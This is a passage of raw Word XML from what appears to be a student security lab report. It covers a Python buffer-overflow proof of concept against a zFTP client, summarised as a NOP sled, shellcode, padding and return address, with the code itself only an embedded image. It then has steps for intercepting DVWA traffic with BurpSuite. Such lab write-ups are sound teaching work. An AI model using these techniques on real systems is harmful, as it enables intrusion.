            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>271780</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4038600" cy="1123950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="301539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39184" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4038600" cy="1123950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>View the sysinfo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551F3858" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="29C16781" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00004322" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="7BAC8A0A" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00004322" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="25389B18" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="07A2AC22" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="06B2419D" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F8BCC6B" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="312E2167" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78637E9D" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D065ED">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Custom Python PoC (Buffer Overflow)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFD4B24" w14:textId="4E239A7B" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:r w:rsidRPr="009D2F06">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2C1830C8" wp14:editId="22DC97F7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>284480</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4266185" cy="5072932"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2025098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98808" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4266185" cy="5072932"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>Below is the modified Python PoC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F387287" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="138E85B4" w14:textId="67915981" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="5DAC0A01" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="2C08AA5F" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="637CC877" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="452361C9" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="796B2CB7" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="1F9F5A60" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="3F5ACBF3" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="194EF02A" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="0460284B" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="77F67F16" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="467677E3" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="49E213E9" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="0122A053" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="286D38FD" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="44D000D3" w14:textId="77777777" w:rsidR="00C716D6" w:rsidRDefault="00C716D6" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="2D7553C8" w14:textId="77777777" w:rsidR="00C716D6" w:rsidRDefault="00C716D6" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="0D683B0B" w14:textId="77777777" w:rsidR="00C716D6" w:rsidRDefault="00C716D6" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="0E5E2DBD" w14:textId="77777777" w:rsidR="00C716D6" w:rsidRDefault="00C716D6" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="72359151" w14:textId="77777777" w:rsidR="00C716D6" w:rsidRDefault="00C716D6" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="1161729B" w14:textId="77777777" w:rsidR="00C716D6" w:rsidRDefault="00C716D6" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="730F54CC" w14:textId="77777777" w:rsidR="00C716D6" w:rsidRDefault="00C716D6" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="45806E91" w14:textId="77777777" w:rsidR="00C716D6" w:rsidRDefault="00C716D6" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="0C41EC50" w14:textId="77777777" w:rsidR="00C716D6" w:rsidRDefault="00C716D6" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="7B5785E4" w14:textId="77777777" w:rsidR="00C716D6" w:rsidRDefault="00C716D6" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="01301B88" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="2D9CD250" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="743D1519" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB"/>
    <w:p w14:paraId="665F5F75" w14:textId="77777777" w:rsidR="00FC71AB" w:rsidRPr="00F62886" w:rsidRDefault="00FC71AB" w:rsidP="00FC71AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F62886">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>50-Word Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C6B5C3" w14:textId="4C42C5C6" w:rsidR="002D36B6" w:rsidRDefault="00FC71AB" w:rsidP="002D36B6">
      <w:r w:rsidRPr="00F62886">
        <w:t>The Python proof-of-concept exploit was modified to improve readability, reliability, and compatibility with Python 3. Configurable buffer sizes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidRPr="00F62886">
        <w:t xml:space="preserve"> structured payload creation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F62886">
        <w:t>were added. The exploit constructs a payload containing a NOP sled, shellcode, padding, and return address to trigger a buffer overflow in the zFTP client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3D035A" w14:textId="7317A14E" w:rsidR="005B2D44" w:rsidRDefault="00113511" w:rsidP="00113511">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc224731502"/>
      <w:r w:rsidRPr="00113511">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>API Security Testing Lab</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="12F4FA09" w14:textId="6A508D27" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0065037B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251674624" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="29FD43AC" wp14:editId="38BB3012">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-187684</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>292017</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5634327" cy="2520015"/>
            <wp:effectExtent l="19050" t="19050" r="24130" b="13970"/>
            <wp:wrapNone/>
            <wp:docPr id="1911309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309882"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45000" cy="2524789"/>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t>Launch the DVWA website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B28F06D" w14:textId="4742D775" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="4C9C788A" w14:textId="454F4440" w:rsidR="00657DED" w:rsidRPr="0065037B" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="29C91209" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="0065037B" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="21C5BD30" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="0065037B" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="39F78CB7" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="0065037B" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="68DE1DBF" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="0065037B" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="2C281D5A" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="0065037B" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="19FACDEE" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="0065037B" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="45BADAD5" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="508EBCA6" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="76FB62B4" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="08619FA8" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="5F56A1F5" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="489AB02E" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="665EB7F3" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="2C6A0023" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="7994019F" w14:textId="280E95D9" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00733312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="21CAACFE" wp14:editId="170FD1EC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3147</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>289808</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4998223" cy="2644650"/>
            <wp:effectExtent l="19050" t="19050" r="12065" b="22860"/>
            <wp:wrapNone/>
            <wp:docPr id="1980288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288249" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4998223" cy="26446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t>Open BurpSuite and turn Intercept on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0F38D5" w14:textId="7E94A86F" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="690417D2" w14:textId="7EF80213" w:rsidR="00657DED" w:rsidRPr="00733312" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="5D12C853" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00733312" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="349C0DB7" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00733312" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="61C6FF18" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00733312" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="2A351EDA" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00733312" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="52ED5095" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00733312" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="75395797" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00733312" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="33E2388A" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00733312" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="089FC334" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="741056CA" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="31DE665D" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="3C09D5AD" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="60572A28" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="0AF93858" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="15F34C75" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="31C8D8BB" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="27CEB6CA" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="0524A67D" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="1510C1CF" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="5FC096B9" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="497FDDC4" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="3EA797CE" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="012F4891" w14:textId="245AE1A8" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB2EDB">
        <w:lastRenderedPageBreak/>
        <w:t>Login and navigate through pages.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB2EDB">
        <w:t>Every request sent by the browser will appear in Burp.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Below are the intercepted requests of the pages in DVWA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFF92DC" w14:textId="4D8FB9E8" w:rsidR="00657DED" w:rsidRDefault="0049249D" w:rsidP="00657DED">
      <w:r w:rsidRPr="00BC1915">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251676672" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="05109EC0" wp14:editId="77674D88">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>26974</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3535183" cy="1743377"/>
            <wp:effectExtent l="19050" t="19050" r="27305" b="28575"/>
            <wp:wrapNone/>
            <wp:docPr id="1723876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876441" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId24">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="16234"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3547163" cy="174928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0B1AD89" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00BC1915" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="5B5B14CE" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00BC1915" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="503A1597" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00BC1915" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="5F5B0F7B" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="122E1463" w14:textId="77777777" w:rsidR="0049249D" w:rsidRDefault="0049249D" w:rsidP="00657DED"/>
    <w:p w14:paraId="405805E1" w14:textId="77777777" w:rsidR="0049249D" w:rsidRDefault="0049249D" w:rsidP="00657DED"/>
    <w:p w14:paraId="20DF13C0" w14:textId="77777777" w:rsidR="0049249D" w:rsidRDefault="0049249D" w:rsidP="00657DED"/>
    <w:p w14:paraId="183567E8" w14:textId="77777777" w:rsidR="0049249D" w:rsidRPr="00BC1915" w:rsidRDefault="0049249D" w:rsidP="00657DED"/>
    <w:p w14:paraId="436DC26B" w14:textId="5FFA2607" w:rsidR="00657DED" w:rsidRPr="00BC1915" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="64C84974" w14:textId="66F21FC9" w:rsidR="00657DED" w:rsidRPr="00BC1915" w:rsidRDefault="0049249D" w:rsidP="00657DED">
      <w:r w:rsidRPr="00A96208">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251677696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="41CE85BE" wp14:editId="500471B8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>25317</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3869138" cy="1474263"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="12065"/>
            <wp:wrapNone/>
            <wp:docPr id="1335304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304294" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3880001" cy="1478402"/>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72B6C506" w14:textId="727AAAAA" w:rsidR="00657DED" w:rsidRPr="00BC1915" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="68B167DF" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="78EAB70A" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="5F7D0373" w14:textId="77777777" w:rsidR="00657DED" w:rsidRPr="00A96208" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="59FA46B1" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="50F3A82A" w14:textId="77777777" w:rsidR="0049249D" w:rsidRDefault="0049249D" w:rsidP="00657DED"/>
    <w:p w14:paraId="11477BDD" w14:textId="77777777" w:rsidR="0049249D" w:rsidRDefault="0049249D" w:rsidP="00657DED"/>
    <w:p w14:paraId="1DB07A40" w14:textId="32E5B273" w:rsidR="0049249D" w:rsidRPr="00A96208" w:rsidRDefault="0049249D" w:rsidP="00657DED">
      <w:r w:rsidRPr="00F205EC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251678720" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="79A2E7BB" wp14:editId="4C8B61E5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>113556</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4012261" cy="1530046"/>
            <wp:effectExtent l="19050" t="19050" r="26670" b="13335"/>
            <wp:wrapNone/>
            <wp:docPr id="1243000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000783" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4012261" cy="1530046"/>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7176CE10" w14:textId="260542F0" w:rsidR="00657DED" w:rsidRPr="00A96208" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="75CC2CE0" w14:textId="7E90B632" w:rsidR="00657DED" w:rsidRPr="00A96208" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="34E29153" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="72EDF20B" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="2D6B887B" w14:textId="77777777" w:rsidR="00657DED" w:rsidRDefault="00657DED" w:rsidP="00657DED"/>
    <w:p w14:paraId="62DF0638" w14:textId="77777777" w:rsidR="0049249D" w:rsidRDefault="0049249D" w:rsidP="00657DED"/>
    <w:p w14:paraId="60855F53" w14:textId="77777777" w:rsidR="0049249D" w:rsidRDefault="0049249D" w:rsidP="00657DED"/>
    <w:p w14:paraId="56C22A8C" w14:textId="77777777" w:rsidR="0049249D" w:rsidRDefault="0049249D" w:rsidP="00657DED"/>
    <w:p w14:paraId="48A6AAFA" w14:textId="56ABCFFE" w:rsidR="0049249D" w:rsidRDefault="0049249D" w:rsidP="00657DED">
